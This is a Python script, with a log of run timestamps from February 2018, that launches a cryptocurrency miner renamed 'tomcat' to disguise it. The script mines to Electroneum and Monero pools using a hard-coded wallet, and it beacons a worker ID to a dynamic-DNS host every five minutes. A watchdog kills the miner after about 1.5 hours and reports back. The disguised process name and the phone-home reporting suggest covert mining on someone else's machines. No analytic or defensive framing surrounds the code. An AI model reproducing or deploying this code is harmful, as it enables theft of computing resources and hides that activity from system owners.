import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:43:03.726883
#2018-02-17 17:32:07.900891
#2018-02-17 19:20:07.739343
#2018-02-17 21:10:01.820457
#2018-02-17 22:53:06.532050
#2018-02-18 00:38:03.574480
#2018-02-18 02:28:07.203964
#2018-02-18 04:15:05.224400
#2018-02-18 06:06:06.322429
#2018-02-18 07:57:04.383954
#2018-02-18 09:45:04.885027
#2018-02-18 11:33:04.034043
#2018-02-18 13:18:04.266603
#2018-02-18 15:08:05.743915
#2018-02-18 16:56:06.990977
#2018-02-18 18:45:04.743876
#2018-02-18 20:31:07.127166
#2018-02-18 22:17:01.668419
#2018-02-19 00:06:06.427058
#2018-02-19 01:53:02.137963
#2018-02-19 03:39:06.292097
#2018-02-19 05:24:06.166004
#2018-02-19 07:13:01.994589
#2018-02-19 09:03:04.237155
#2018-02-19 10:52:06.216289
#2018-02-19 12:41:05.805582
#2018-02-19 14:28:07.498142
#2018-02-19 16:18:04.876738
#2018-02-19 18:06:04.903245
#2018-02-19 19:54:07.242091
#2018-02-19 21:41:03.496175
#2018-02-19 23:29:06.236741
#2018-02-20 01:16:05.195308
#2018-02-20 03:07:06.735758
#2018-02-20 04:54:06.325890
#2018-02-20 06:37:06.011255
#2018-02-20 08:22:06.121764
#2018-02-20 10:07:06.599924
#2018-02-20 11:52:08.077744
#2018-02-20 13:39:07.978851
#2018-02-20 15:24:01.284398
#2018-02-20 17:09:09.005787
#2018-02-20 18:58:01.408933
#2018-02-20 20:47:07.432636
#2018-02-20 22:30:07.179346
#2018-02-21 00:13:05.156249
#2018-02-21 02:01:07.582423
#2018-02-21 03:49:05.414985
#2018-02-21 05:35:08.347239
#2018-02-21 07:24:22.794867
#2018-02-21 09:08:04.218112
#2018-02-21 10:56:08.430031
#2018-02-21 12:42:01.781766
#2018-02-21 14:31:06.262455
#2018-02-21 16:18:10.053610
#2018-02-21 18:08:01.491241
#2018-02-21 19:55:03.027338
#2018-02-21 21:41:06.395316
#2018-02-21 23:29:07.635410
#2018-02-22 01:18:08.036824
#2018-02-22 03:07:01.983411
#2018-02-22 04:52:01.655907
#2018-02-22 06:37:05.412270
#2018-02-22 08:24:08.213404
#2018-02-22 10:12:08.756075
#2018-02-22 11:58:06.587038
#2018-02-22 13:44:05.796986
#2018-02-22 15:32:09.278540
#2018-02-22 17:19:05.163348
#2018-02-22 19:06:02.242519
#2018-02-22 20:59:01.946554
#2018-02-22 22:44:10.118986
#2018-02-23 00:31:05.876906
#2018-02-23 02:17:08.589699
#2018-02-23 04:06:05.813920
#2018-02-23 05:53:06.879666
#2018-02-23 07:42:06.671771
#2018-02-23 09:44:04.444258
#2018-02-23 11:52:01.368715
#2018-02-23 13:41:07.512090
#2018-02-23 15:29:06.295876
#2018-02-23 17:19:08.238837
#2018-02-23 19:03:09.381651
#2018-02-23 20:50:03.054151
#2018-02-23 22:39:06.637068
#2018-02-24 00:26:07.118615
#2018-02-24 02:17:07.970293
#2018-02-24 04:07:01.795523
#2018-02-24 05:53:04.838736
#2018-02-24 07:43:01.650464
#2018-02-24 09:28:05.464928
#2018-02-24 11:22:01.750741
#2018-02-24 13:11:06.729573
#2018-02-24 15:01:05.960773
#2018-02-24 16:50:07.966666
#2018-02-24 18:39:03.676867
#2018-02-24 20:29:06.305602
#2018-02-24 22:26:04.825604
#2018-02-25 01:35:08.272751
#2018-02-25 05:11:05.391974
#2018-02-25 10:48:01.305938